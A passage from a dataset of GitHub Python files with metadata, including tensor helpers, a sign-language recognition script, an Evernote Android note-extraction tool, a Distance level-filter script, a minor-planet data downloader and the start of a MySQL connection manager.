ndarray:\n return a.squeeze(axis=axis)\n else:\n raise TypeError\n\n\ndef _cat_stack(fn: str,\n a: Union[Tuple[TensArr, ...], List[TensArr]],\n axis=0,\n astype: type=None) -> TensArr:\n fn_dict = {(torch, 'cat'): torch.cat,\n (np, 'cat'): np.concatenate,\n (torch, 'stack'): torch.stack,\n (np, 'stack'): np.stack,\n }\n\n types = [type(item) for item in a]\n if np.any(types != types[0]):\n a = [convert(item, (astype if astype else types[0])) for item in a]\n\n if types[0] == Tensor:\n result = fn_dict[(torch, fn)](a, dim=axis)\n elif types[0] == ndarray:\n result = fn_dict[(np, fn)](a, axis=axis)\n else:\n raise TypeError\n\n return convert(result, astype) if astype else result\n\n\ndef cat(*args, **kargs) -> TensArr:\n \"\"\"\n \n a:Union[Tuple[TensArr, ...], List[TensArr]]\n axis=0\n astype: type=None\n \"\"\"\n return _cat_stack('cat', *args, **kargs)\n\n\ndef stack(*args, **kargs) -> TensArr:\n \"\"\"\n \n a: Union[Tuple[TensArr, ...], List[TensArr]]\n axis=0\n astype: type=None\n \"\"\"\n return _cat_stack('stack', *args, **kargs)\n\n\ndef sum_axis(a: TensArr, axis=None):\n if axis:\n if type(a) == Tensor:\n return a.sum(dim=axis)\n elif type(a) == ndarray:\n return a.sum(axis=axis)\n else:\n raise TypeError\n else:\n return a.sum()\n", "repo_name": "WXB506/De-reverberation", "sub_path": "generic.py", "file_name": "generic.py", "file_ext": "py", "file_size_in_byte": 3076, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "53", "api": [{"api_name": "typing.TypeVar", "line_number": 14, "usage_type": "call"}, {"api_name": "torch.Tensor", "line_number": 14, "usage_type": "argument"}, {"api_name": "numpy.ndarray", "line_number": 14, "usage_type": "argument"}, {"api_name": "torch.Tensor", "line_number": 18, "usage_type": "name"}, {"api_name": "torch.Tensor", "line_number": 19, "usage_type": "name"}, {"api_name": "torch.tensor", "line_number": 22, "usage_type": "call"}, {"api_name": "torch.float32", "line_number": 22, "usage_type": "attribute"}, {"api_name": "numpy.ndarray", "line_number": 23, "usage_type": "name"}, {"api_name": "torch.Tensor", "line_number": 24, "usage_type": "name"}, {"api_name": "torch.Tensor", "line_number": 33, "usage_type": "name"}, {"api_name": "numpy.ndarray", "line_number": 35, "usage_type": "name"}, {"api_name": "typing.Tuple", "line_number": 32, "usage_type": "name"}, {"api_name": "torch.Tensor", "line_number": 42, "usage_type": "name"}, {"api_name": "numpy.ndarray", "line_number": 44, "usage_type": "name"}, {"api_name": "typing.Union", "line_number": 51, "usage_type": "name"}, {"api_name": "typing.Tuple", "line_number": 51, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 51, "usage_type": "name"}, {"api_name": "torch.Tensor", "line_number": 52, "usage_type": "name"}, {"api_name": "numpy.ndarray", "line_number": 61, "usage_type": "name"}, {"api_name": "torch.Tensor", "line_number": 71, "usage_type": "name"}, {"api_name": "numpy.ndarray", "line_number": 73, "usage_type": "name"}, {"api_name": "typing.Union", "line_number": 80, "usage_type": "name"}, {"api_name": "typing.Tuple", "line_number": 80, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 80, "usage_type": "name"}, {"api_name": "torch.cat", "line_number": 83, "usage_type": "attribute"}, {"api_name": "numpy.concatenate", "line_number": 84, "usage_type": "attribute"}, {"api_name": "torch.stack", "line_number": 85, "usage_type": "attribute"}, {"api_name": "numpy.stack", "line_number": 86, "usage_type": "attribute"}, {"api_name": "numpy.any", "line_number": 90, "usage_type": "call"}, {"api_name": "torch.Tensor", "line_number": 93, "usage_type": "name"}, {"api_name": "numpy.ndarray", "line_number": 95, "usage_type": "name"}, {"api_name": "torch.Tensor", "line_number": 125, "usage_type": "name"}, {"api_name": "numpy.ndarray", "line_number": 127, "usage_type": "name"}]}
+{"seq_id": "19143924384", "text": "import os\n\nos.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'\n\nimport cv2\nimport mediapipe as mp\nimport torch\nfrom model import SimpleCNN, load_model, min_max_scale\nimport numpy as np\n\nmodel = SimpleCNN(26)\nmodel = load_model(model)\nmodel.eval()\nmphands = mp.solutions.hands\nhands = mphands.Hands()\nmp_drawing = mp.solutions.drawing_utils\nmapper = {0: 'a',\n 1: 'b',\n 2: 'c',\n 3: 'd',\n 4: 'e',\n 5: 'f',\n 6: 'g',\n 7: 'h',\n 8: 'i',\n 9: 'j',\n 10: 'k',\n 11: 'l',\n 12: 'm',\n 13: 'n',\n 14: 'o',\n 15: 'p',\n 16: 'q',\n 17: 'r',\n 18: 's',\n 19: 't',\n 20: 'u',\n 21: 'v',\n 22: 'w',\n 23: 'x',\n 24: 'y',\n 25: 'z'}\n\ncap = cv2.VideoCapture(0)\n_, frame = cap.read()\nh, w, c = frame.shape\n\nwhile True:\n _, frame = cap.read()\n\n k = cv2.waitKey(1)\n if k % 256 == 27:\n # ESC pressed\n print(\"Escape hit, closing...\")\n break\n\n framergb = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)\n result = hands.process(framergb)\n hand_landmarks = result.multi_hand_landmarks\n if hand_landmarks:\n for handLMs in hand_landmarks:\n new_hande = []\n # print(handLMs)\n X_arr = []\n Y_arr = []\n Z_arr = []\n for hl in handLMs.landmark:\n X_arr.append(hl.x)\n Y_arr.append(hl.y)\n Z_arr.append(hl.z)\n # new_hande.append(hl.x)\n # new_hande.append(hl.y)\n # new_hande.append(hl.z)\n X_arr = min_max_scale(X_arr)\n Y_arr = min_max_scale(Y_arr)\n Z_arr = min_max_scale(Z_arr)\n\n for i in range(len(X_arr)):\n new_hande.append(X_arr[i])\n new_hande.append(Y_arr[i])\n new_hande.append(Z_arr[i])\n\n new_hande = np.array(new_hande)\n sign_data = torch.Tensor(new_hande.reshape(1, 21, 3).astype(float))\n sign_data = torch.unsqueeze(sign_data, 0)\n output = model(sign_data)\n _, preds = torch.max(output.data, 1)\n print(mapper[preds.item()])\n cv2.imshow(\"Frame\", frame)\n\ncap.release()\ncv2.destroyAllWindows()\n", "repo_name": "YuriyPukhta/Sign-Language-recognition", "sub_path": "test_hand_lendmarks/main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 2318, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "os.environ", "line_number": 3, "usage_type": "attribute"}, {"api_name": "model.SimpleCNN", "line_number": 11, "usage_type": "call"}, {"api_name": "model.load_model", "line_number": 12, "usage_type": "call"}, {"api_name": "model.eval", "line_number": 13, "usage_type": "call"}, {"api_name": "mediapipe.solutions", "line_number": 14, "usage_type": "attribute"}, {"api_name": "mediapipe.solutions", "line_number": 16, "usage_type": "attribute"}, {"api_name": "cv2.VideoCapture", "line_number": 44, "usage_type": "call"}, {"api_name": "cv2.waitKey", "line_number": 51, "usage_type": "call"}, {"api_name": "cv2.cvtColor", "line_number": 57, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2RGB", "line_number": 57, "usage_type": "attribute"}, {"api_name": "model.min_max_scale", "line_number": 74, "usage_type": "call"}, {"api_name": "model.min_max_scale", "line_number": 75, "usage_type": "call"}, {"api_name": "model.min_max_scale", "line_number": 76, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 83, "usage_type": "call"}, {"api_name": "torch.Tensor", "line_number": 84, "usage_type": "call"}, {"api_name": "torch.unsqueeze", "line_number": 85, "usage_type": "call"}, {"api_name": "torch.max", "line_number": 87, "usage_type": "call"}, {"api_name": "cv2.imshow", "line_number": 89, "usage_type": "call"}, {"api_name": "cv2.destroyAllWindows", "line_number": 92, "usage_type": "call"}]}
+{"seq_id": "73475231208", "text": "import sqlite3\nimport os\nimport shutil\nfrom random import randrange\n\n__maintainer__ = \"Yassine Abdelouahed \"\n__date__ = '18.08.2020'\n__revision__ = 'version 1'\n\ndef normalize_filename(fn):\n valid_chars = \"-_.()\"\n out = \"\"\n for c in fn:\n if str.isalpha(c) or str.isdigit(c) or (c in valid_chars):\n out += c\n else:\n out += \"_\"\n return out\n\n\ndef read_db(table, id=\"\"):\n conn = sqlite3.connect(DATABASE_PATH)\n # create a coursor\n c = conn.cursor()\n # print(\"Start reading\")\n if table == \"notebooks\":\n c.execute(\"SELECT guid, name, stack FROM notebooks ORDER BY stack\")\n elif table == \"notes\":\n query = \"SELECT guid, title FROM notes WHERE notebook_guid=\\'\" + id + \"\\'\"\n c.execute(query)\n else:\n c.execute(\"SELECT guid, name, stack FROM notes\")\n\n return c.fetchall()\n\n\ndef create_folder(parent_dir, dir):\n path = os.path.join(parent_dir, dir)\n if not os.path.exists(path):\n os.mkdir(path)\n\n\ndef copy_files(src, dest, note_title, folder_name):\n # \"normalizing\" the folder name so that it contains only allowed characters\n new_note_title = normalize_filename(str(note_title))\n\n # Verhindern das Problem, wenn Notizen der gleiche Titel haben\n while os.path.exists(os.path.join(dest, new_note_title)):\n new_note_title += \"_R\" + str(randrange(1000))\n\n # set the new folder name according to the note title\n dest_folder = os.path.join(dest, new_note_title)\n create_folder(dest, new_note_title)\n\n src_files = os.listdir(src)\n for file_name in src_files:\n full_file_name = os.path.join(src, file_name)\n if os.path.isfile(full_file_name):\n shutil.copy(full_file_name, dest_folder)\n extension = os.path.splitext(full_file_name)[1]\n # filter the files according the extension\n if extension == \".enml\":\n source = os.path.join(dest_folder, full_file_name.split('\\\\')[-1])\n destination = os.path.splitext(source)[0] + \".html\"\n shutil.move(source, destination)\n # Editing the content of the HTML File => \"en-media hash\" to \"img src\"\n edit_html(destination)\n elif extension == \".dat\":\n source = os.path.join(dest_folder, full_file_name.split('\\\\')[-1])\n destination = os.path.splitext(source)[0]\n shutil.move(source, destination)\n\n\n# adjust the html file\ndef edit_html(source_file):\n # open the html file, adjust the substr \"en-media hash\" to \"img src\"\n with open(source_file, \"rt\", encoding=\"UTF-8\") as f:\n new_text = f.read().replace('en-media hash', 'img src')\n # save the changes to the file\n with open(source_file, \"wt\", encoding=\"UTF-8\") as f:\n f.write(new_text)\n\n\n# find the note directory with the help of the guid\ndef find_dir(name, path):\n # ignore the linked folder\n substr = \"linked\"\n for root, subdirs, files in os.walk(path):\n if substr in root:\n continue\n for d in subdirs:\n if d == name and substr not in d:\n return os.path.join(root, name)\n\n\ndef find_and_extract(dest_folder,notebook_name,notebook_id):\n # create notebook folder\n create_folder(dest_folder, normalize_filename(notebook_name))\n # remember the current notebook path\n notebook_path = os.path.join(dest_folder, normalize_filename(notebook_name))\n # read the database notes and filter the notes after the current notebook_guid\n notes_result = read_db(\"notes\", notebook_id)\n for note in notes_result:\n note_titel = note[1]\n note_id = note[0]\n # with the held of note_id find where the desired note_folder \"X\" lies\n folder_path = find_dir(note_id, source_path)\n if folder_path is None:\n continue\n copy_files(folder_path, notebook_path, note_titel, note_id)\n\nif __name__ == '__main__':\n # Directory\n directory = \"Evernote\"\n # the source path\n source_path = input(\"Please enter the source/package path of the evernote: \")\n # database path\n DATABASE_PATH = input(\"Please enter the database path(/com.evenote/databases/user...): \")\n # Parent Directory path\n parent_dir = input(\"Please enter where you want to save the results: \")\n\n # Create Results folder\n create_folder(parent_dir, directory)\n path = os.path.join(parent_dir, directory)\n\n # Read the notebook database\n results = read_db(\"notebooks\")\n\n # help variables\n current_stack = \"\"\n def_path = path\n current_path = path\n\n print(\"Starting the extraction\")\n # x steht für derzeitige Notebook von der Liste results\n for x in results:\n notebook_name = x[1]\n notebook_id = x[0]\n notebook_parent = x[2]\n\n # incase a notebook \"x[2]\" did't belong to a certain stack\n if notebook_parent is None:\n find_and_extract(def_path, notebook_name, notebook_id)\n continue\n\n # organise the stack\n if notebook_parent != current_stack:\n current_stack = normalize_filename(notebook_parent)\n # set the current path to the stack folder path\n current_path = os.path.join(def_path, current_stack)\n # create stack folder\n create_folder(def_path, current_stack)\n\n find_and_extract(current_path, notebook_name, notebook_id)\n\n\n\n input(\"Done, Press Enter to continue...\")\n", "repo_name": "yabdelouahed/Forensics-Tools", "sub_path": "Evernote - Android/evernote.py", "file_name": "evernote.py", "file_ext": "py", "file_size_in_byte": 5474, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "sqlite3.connect", "line_number": 22, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 38, "usage_type": "call"}, {"api_name": "os.path", "line_number": 38, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 39, "usage_type": "call"}, {"api_name": "os.path", "line_number": 39, "usage_type": "attribute"}, {"api_name": "os.mkdir", "line_number": 40, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 48, "usage_type": "call"}, {"api_name": "os.path", "line_number": 48, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 48, "usage_type": "call"}, {"api_name": "random.randrange", "line_number": 49, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 52, "usage_type": "call"}, {"api_name": "os.path", "line_number": 52, "usage_type": "attribute"}, {"api_name": "os.listdir", "line_number": 55, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 57, "usage_type": "call"}, {"api_name": "os.path", "line_number": 57, "usage_type": "attribute"}, {"api_name": "os.path.isfile", "line_number": 58, "usage_type": "call"}, {"api_name": "os.path", "line_number": 58, "usage_type": "attribute"}, {"api_name": "shutil.copy", "line_number": 59, "usage_type": "call"}, {"api_name": "os.path.splitext", "line_number": 60, "usage_type": "call"}, {"api_name": "os.path", "line_number": 60, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 63, "usage_type": "call"}, {"api_name": "os.path", "line_number": 63, "usage_type": "attribute"}, {"api_name": "os.path.splitext", "line_number": 64, "usage_type": "call"}, {"api_name": "os.path", "line_number": 64, "usage_type": "attribute"}, {"api_name": "shutil.move", "line_number": 65, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 69, "usage_type": "call"}, {"api_name": "os.path", "line_number": 69, "usage_type": "attribute"}, {"api_name": "os.path.splitext", "line_number": 70, "usage_type": "call"}, {"api_name": "os.path", "line_number": 70, "usage_type": "attribute"}, {"api_name": "shutil.move", "line_number": 71, "usage_type": "call"}, {"api_name": "os.walk", "line_number": 88, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 93, "usage_type": "call"}, {"api_name": "os.path", "line_number": 93, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 100, "usage_type": "call"}, {"api_name": "os.path", "line_number": 100, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 124, "usage_type": "call"}, {"api_name": "os.path", "line_number": 124, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 150, "usage_type": "call"}, {"api_name": "os.path", "line_number": 150, "usage_type": "attribute"}]}
+{"seq_id": "5695387678", "text": "\"\"\"Apply filters to a level or CustomObject.\"\"\"\n\n\nimport os\nimport sys\nimport argparse\nfrom contextlib import contextmanager\n\nfrom distance import DefaultClasses\nfrom distance.levelobjects import LevelObject\nfrom distance.filter import getfilter\nfrom distance.printing import PrintContext\n\n\nlevel_objects = DefaultClasses.level_objects\n\n\ndef filterlevel_getfilter(name):\n if name == 'file':\n return FileFilter\n return getfilter(name)\n\n\n@contextmanager\ndef optcontext(obj, func, *args, **kw):\n if obj is None:\n yield\n else:\n with getattr(obj, func)(*args, **kw) as o:\n yield o\n\n\ndef apply_filters(filters, content, p=None, **kw):\n if p:\n p(f\"Filters: {len(filters)}\")\n with optcontext(p, 'tree_children', count=len(filters)):\n for f in filters:\n if p:\n p.tree_next_child()\n p(f\"Filter: {f.__def_string}\")\n if not f.apply(content, p=p, **kw):\n return False\n return True\n\n\nclass FileFilter(object):\n\n @classmethod\n def add_args(cls, parser):\n parser.add_argument(\":src\", help=\"File containing the filter definitions.\")\n parser.add_argument(\":relative_to\", help=\"Path that src is relative to (used internally).\")\n parser.description = \"Load a filter chain from file.\"\n parser.epilog = \"\"\"\n Filter files consist any number of filters, one per line.\n Filters are formatted as per the -o/--of/--objfilter argument.\n Empty lines and lines starting with '#' are ignored.\n \"\"\"\n\n def __init__(self, args):\n src = args.src\n relative_to = args.__dict__.pop('relative_to', None) or '.'\n if not src.startswith('/'):\n src = os.path.join(relative_to, src)\n abssrc = os.path.abspath(src)\n self.src = os.path.relpath(src)\n\n def create(l):\n defaults = dict(relative_to=os.path.dirname(abssrc), **args.__dict__)\n return create_filter(l, defaults)\n\n with open(abssrc, 'r') as f:\n self.filters = [create(l) for l in map(str.strip, f)\n if l and not l.startswith('#')]\n self.aborted = False\n\n def apply(self, content, p=None, **kw):\n if p:\n p(f\"File: {self.src!r}\")\n apply_filters(self.filters, content, p=p)\n return True\n\n\ndef make_arglist(s):\n\n def iter_tokens(source):\n if not source:\n return\n token = []\n escape = False\n for char in source:\n if escape:\n escape = False\n token.append(char)\n elif char == '\\\\':\n escape = True\n elif char == ':':\n yield token\n token = []\n else:\n token.append(char)\n yield token\n\n return [\":\" + ''.join(token) for token in iter_tokens(s)]\n\n\ndef create_filter(option, defaults):\n name, sep, argstr = option.partition(':')\n cls = filterlevel_getfilter(name)\n\n parser = argparse.ArgumentParser(prog=name, prefix_chars=':',\n add_help=False)\n parser.add_argument(':help', action='help', default=argparse.SUPPRESS,\n help='show this help message and exit')\n parser.set_defaults(**defaults)\n cls.add_args(parser)\n args = parser.parse_args(make_arglist(argstr))\n\n flt = cls(args)\n flt.__def_string = option\n return flt\n\n\ndef main():\n parser = argparse.ArgumentParser(\n description=__doc__)\n parser.add_argument(\"-f\", \"--force\", action='store_true',\n help=\"Allow overwriting OUT file.\")\n parser.add_argument(\"-l\", \"--maxrecurse\", type=int, default=-1,\n help=\"Maximum recursion depth.\")\n parser.add_argument(\"-o\", \"--of\", \"--objfilter\", dest='objfilters',\n action='append', default=[],\n help=\"Specify a filter option.\")\n parser.add_argument(\"--list\", action='store_true',\n help=\"Dump result listing.\")\n parser.add_argument(\"IN\", nargs='?',\n help=\"Level .bytes filename.\")\n parser.add_argument(\"OUT\", nargs='?',\n help=\"output .bytes filename.\")\n args = parser.parse_args()\n\n defaults = dict(maxrecurse=args.maxrecurse)\n filters = [create_filter(f, defaults) for f in args.objfilters]\n\n if args.IN is None:\n print(f\"{parser.prog}: No input file specified.\", file=sys.stderr)\n return 1\n\n if args.OUT is None:\n print(f\"{parser.prog}: No output file specified.\", file=sys.stderr)\n return 1\n\n write_mode = 'xb'\n if args.force:\n write_mode = 'wb'\n elif args.OUT != '-' and os.path.exists(args.OUT):\n print(f\"{parser.prog}: file {args.OUT} exists.\"\n \" pass -f to force.\", file=sys.stderr)\n return 1\n\n if args.IN == '-':\n from io import BytesIO\n srcarg = BytesIO(sys.stdin.buffer.read())\n else:\n srcarg = args.IN\n content = DefaultClasses.level_like.read(srcarg)\n\n is_wrapped = False\n if isinstance(content, LevelObject) and content.type != 'Group':\n is_wrapped = True\n content = DefaultClasses.level_objects.create('Group', children=[content])\n\n p = PrintContext(file=sys.stderr, flags=('groups', 'subobjects'))\n\n if not apply_filters(filters, content, p=p):\n return 1\n\n if is_wrapped and len(content.children) == 1:\n content = content.children[0]\n\n if args.list:\n p.print_object(content)\n\n print(\"writing...\", file=sys.stderr)\n if args.OUT == '-':\n destarg = sys.stdout.buffer\n else:\n destarg = args.OUT\n n = content.write(destarg, write_mode=write_mode)\n print(f\"{n} bytes written\", file=sys.stderr)\n return 0\n\n\nif __name__ == '__main__':\n exit(main())\n\n\n# vim:set sw=4 ts=8 sts=4 et:\n", "repo_name": "ferreum/distanceutils", "sub_path": "distance_scripts/filterlevel.py", "file_name": "filterlevel.py", "file_ext": "py", "file_size_in_byte": 5909, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 7, "dataset": "github-code", "pt": "53", "api": [{"api_name": "distance.DefaultClasses.level_objects", "line_number": 15, "usage_type": "attribute"}, {"api_name": "distance.DefaultClasses", "line_number": 15, "usage_type": "name"}, {"api_name": "distance.filter.getfilter", "line_number": 21, "usage_type": "call"}, {"api_name": "contextlib.contextmanager", "line_number": 24, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 63, "usage_type": "call"}, {"api_name": "os.path", "line_number": 63, "usage_type": "attribute"}, {"api_name": "os.path.abspath", "line_number": 64, "usage_type": "call"}, {"api_name": "os.path", "line_number": 64, "usage_type": "attribute"}, {"api_name": "os.path.relpath", "line_number": 65, "usage_type": "call"}, {"api_name": "os.path", "line_number": 65, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 68, "usage_type": "call"}, {"api_name": "os.path", "line_number": 68, "usage_type": "attribute"}, {"api_name": "argparse.ArgumentParser", "line_number": 110, "usage_type": "call"}, {"api_name": "argparse.SUPPRESS", "line_number": 112, "usage_type": "attribute"}, {"api_name": "argparse.ArgumentParser", "line_number": 124, "usage_type": "call"}, {"api_name": "sys.stderr", "line_number": 145, "usage_type": "attribute"}, {"api_name": "sys.stderr", "line_number": 149, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 155, "usage_type": "call"}, {"api_name": "os.path", "line_number": 155, "usage_type": "attribute"}, {"api_name": "sys.stderr", "line_number": 157, "usage_type": "attribute"}, {"api_name": "io.BytesIO", "line_number": 162, "usage_type": "call"}, {"api_name": "sys.stdin.buffer.read", "line_number": 162, "usage_type": "call"}, {"api_name": "sys.stdin", "line_number": 162, "usage_type": "attribute"}, {"api_name": "distance.DefaultClasses.level_like.read", "line_number": 165, "usage_type": "call"}, {"api_name": "distance.DefaultClasses.level_like", "line_number": 165, "usage_type": "attribute"}, {"api_name": "distance.DefaultClasses", "line_number": 165, "usage_type": "name"}, {"api_name": "distance.levelobjects.LevelObject", "line_number": 168, "usage_type": "argument"}, {"api_name": "distance.DefaultClasses.level_objects.create", "line_number": 170, "usage_type": "call"}, {"api_name": "distance.DefaultClasses.level_objects", "line_number": 170, "usage_type": "attribute"}, {"api_name": "distance.DefaultClasses", "line_number": 170, "usage_type": "name"}, {"api_name": "distance.printing.PrintContext", "line_number": 172, "usage_type": "call"}, {"api_name": "sys.stderr", "line_number": 172, "usage_type": "attribute"}, {"api_name": "sys.stderr", "line_number": 183, "usage_type": "attribute"}, {"api_name": "sys.stdout", "line_number": 185, "usage_type": "attribute"}, {"api_name": "sys.stderr", "line_number": 189, "usage_type": "attribute"}]}
+{"seq_id": "4610265850", "text": "import os\nimport gzip\nimport requests\n\nURL = 'https://minorplanetcenter.net/Extended_Files/mpcorb_extended.dat.gz'\n\ndef run():\n path = '/tmp/mpcorb_extended.dat.gz'\n if not os.path.exists(path):\n print(f'download {URL}')\n r = requests.get(URL)\n with open(path, 'wb') as out:\n out.write(r.content)\n lines = gzip.open(path, 'rt').readlines()\n lines = [x for x in lines if len(x) > 162]\n # Remove Pluto (we have it as a planet)\n lines = [x for x in lines if x[175:180] != 'Pluto']\n # Sort by magnitude.\n lines = sorted(lines, key=lambda x: float(x[8:14].strip() or 'inf'))\n # Keep only 500 first.\n lines = lines[:500]\n out = open(\"apps/test-skydata/mpcorb.dat\", \"w\")\n for line in lines:\n print(line, file=out)\n out.close()\n\n\nif __name__ == '__main__':\n run()\n", "repo_name": "Stellarium/stellarium-web-engine", "sub_path": "tools/make-mpc.py", "file_name": "make-mpc.py", "file_ext": "py", "file_size_in_byte": 837, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 341, "dataset": "github-code", "pt": "53", "api": [{"api_name": "os.path.exists", "line_number": 9, "usage_type": "call"}, {"api_name": "os.path", "line_number": 9, "usage_type": "attribute"}, {"api_name": "requests.get", "line_number": 11, "usage_type": "call"}, {"api_name": "gzip.open", "line_number": 14, "usage_type": "call"}]}
+{"seq_id": "16701568407", "text": "\"\"\"\nThis python script is using official MySQL python connector from MySQL connector website.\nWhile official python module is using 'low level' MySQL querries,\nthis dbmanager wraps them around to more pythonic functions.\n\"\"\"\nimport sys\nimport os.path\nimport logging\nfrom contextlib import contextmanager\nfrom typing import List, Tuple, Any, Union\nfrom mysql.connector import Error, errorcode, pooling\nfrom functools import lru_cache\nfrom configparser import ConfigParser\n##=====================================\n\n\nAPP_DIR = os.path.dirname(os.path.abspath(__file__))\nLOGGING_CFG_FILE = os.path.join(APP_DIR, \"config\", \"logging_config.ini\")\n\nclass Connect:\n \"\"\" main connect class \"\"\"\n\n # Define the connection pool outside of the __init__ method\n cnxpool = None\n\n def __init__(self, cfg='config.ini', debug=False, pool_size=5):\n \"\"\"\n Initializes the database connection manager.\n\n :param cfg: Path to the configuration file, default is 'config.ini'.\n :param debug: Enables or disables debug mode, default is False.\n :param key: Optional key parameter.\n :param value: Optional value parameter.\n \"\"\"\n self.debug = debug\n self.init_logging()\n LOG.debug(\"log initialized\")\n self.cfgfile = cfg\n db_config = self.read_db_config(self.cfgfile)\n db_config[\"ssl_disabled\"] = True\n self.db_name = db_config.get(\"database\")\n self.key = None\n self.value = None\n self.conn = None\n self.pool = pooling.MySQLConnectionPool(pool_name=\"mypool\",\n pool_size=pool_size,\n **db_config)\n\n def __enter__(self):\n try:\n self.conn = self.pool.get_connection()\n if self.conn.is_connected():\n LOG.debug('Connected to MySQL database successfully')\n return self\n else:\n LOG.error('Failed to obtain connection from pool')\n # Handle the error as needed\n except Exception as e:\n LOG.error('Error while obtaining connection: %s', e)\n # Handle the error as needed\n\n def __exit__(self, exc_type, exc_value, traceback):\n \"\"\"\n Exits the context of the database connection manager, closing the connection if needed.\n\n :param exc_type: Exception type.\n :param exc_value: Exception value.\n :param traceback: Exception traceback.\n \"\"\"\n if self.conn and hasattr(self.conn, 'is_connected') and self.conn.is_connected():\n LOG.debug('Returning connection to pool')\n self.conn.close()\n logging.shutdown()\n\n @contextmanager\n def cursor(self):\n \"\"\"\n Provides a cursor to interact with the MySQL database. The cursor is buffered.\n\n :yield: Buffered cursor.\n \"\"\"\n cur = self.conn.cursor(buffered=True)\n try:\n yield cur\n finally:\n cur.close()\n\n @staticmethod\n def init_logging(log_file=None, append=False, console_loglevel=logging.CRITICAL, enable_console_logging=True):\n \"\"\"\n Initializes the logging system for the database connection manager.\n Configures the log level and format based on the debug setting.\n\n :param log_file: The path to the log file. If None, logging to a file is disabled.\n :param append: If True, append to the log file; otherwise, overwrite it.\n :param console_loglevel: The log level for console logging.\n :param enable_console_logging: If True, enable logging to the console.\n :return: None\n \"\"\"\n logger = logging.getLogger(__name__)\n logger.setLevel(logging.DEBUG)\n\n if log_file is not None:\n filemode_val = 'a' if append else 'w'\n file_handler = logging.FileHandler(log_file, mode=filemode_val)\n file_handler.setLevel(logging.DEBUG)\n file_handler.setFormatter(logging.Formatter(\"%(asctime)s %(levelname)s %(threadName)s %(name)s %(message)s\"))\n logger.addHandler(file_handler)\n\n if enable_console_logging:\n console = logging.StreamHandler()\n console.setLevel(console_loglevel)\n console.setFormatter(logging.Formatter('%(asctime)s %(name)-12s %(levelname)-8s %(message)s'))\n logger.addHandler(console)\n\n global LOG\n LOG = logger\n\n @lru_cache(maxsize=100)\n def raw_call(self, call: str) -> Union[List, int]:\n \"\"\"\n Allows execution of a raw SQL call to the connected MySQL database.\n\n :param call: The raw SQL query string to execute.\n :return: The result of the query as a list of rows, or 0 if an error occurs.\n :raises Error: If there is an error in executing the query.\n \"\"\"\n with self.cursor() as cursor:\n query = call\n LOG.debug(\"EXECUTING: %s\", query)\n try:\n cursor.execute(query)\n get_query = cursor.fetchall()\n return get_query\n except Error as err:\n LOG.debug(\"\\n\\nSomething went wrong: %s\", err)\n return None\n\n def save(self):\n \"\"\"\n Commits changes to the connected MySQL database.\n\n :return: None, as the method commits the changes to the database and logs a success message.\n \"\"\"\n self.conn.commit()\n LOG.debug('Changes Saved to DB')\n\n def test_connection(self):\n try:\n # You can use any light query to test the connection\n with self.cursor() as cursor:\n cursor.execute(\"SELECT 1\")\n return True\n except:\n return False\n\n def show_tables(self) -> List[str]:\n \"\"\"\n Retrieves the names of all the tables in the connected MySQL database.\n\n :return: A list of table names in the connected database.\n :raises Exception: If there is an error in retrieving table names.\n \"\"\"\n with self.cursor() as cursor:\n query: str = \"SHOW TABLES\"\n LOG.debug(\"EXECUTING: %s\", query)\n cursor.execute(query)\n tables: List[str] = list(list(zip(*cursor.fetchall()))[0])\n return tables\n\n def get_primary_key(self, tablename: str) -> str:\n \"\"\"\n Retrieves the primary key column name for the specified table in the connected MySQL database.\n\n :param tablename: The name of the table for which to retrieve the primary key.\n :return: The name of the primary key column.\n :raises Exception: If there is an error in retrieving the primary key.\n \"\"\"\n with self.cursor() as cursor:\n query = \"SELECT `COLUMN_NAME` FROM `information_schema`.`COLUMNS` WHERE (`TABLE_NAME` = %s) AND (`COLUMN_KEY` = 'PRI')\"\n LOG.debug(\"EXECUTING: %s\", query)\n cursor.execute(query, (tablename,))\n primary_key_name = cursor.fetchone()[0]\n return primary_key_name\n\n def get_column_names(self, tablename: str) -> List[str]:\n \"\"\"\n Retrieves the names of all columns for the specified table in the connected MySQL database.\n\n :param tablename: The name of the table for which to retrieve the column names.\n :return: A list of column names.\n :raises Exception: If there is an error in retrieving the column names.\n \"\"\"\n with self.cursor() as cursor:\n query = \"SELECT column_name FROM information_schema.columns WHERE table_schema=%s AND table_name=%s ORDER BY ORDINAL_POSITION\"\n LOG.debug(\"EXECUTING: %s\", query)\n cursor.execute(query, (self.db_name, tablename))\n column_names = list(list(zip(*cursor.fetchall()))[0])\n return column_names\n\n def get_all_rows(self, tablename: str) -> List[Tuple]:\n \"\"\"\n Retrieves all rows from the specified table in the connected MySQL database.\n\n :param tablename: The name of the table from which to retrieve the rows.\n :return: A list of rows, where each row is represented as a tuple.\n :raises Exception: If there is an error in retrieving the rows.\n \"\"\"\n with self.cursor() as cursor:\n query = \"SELECT * FROM {0:s}\".format(tablename)\n LOG.debug(\"EXECUTING: %s\", query)\n cursor.execute(query)\n all_rows = cursor.fetchall()\n return 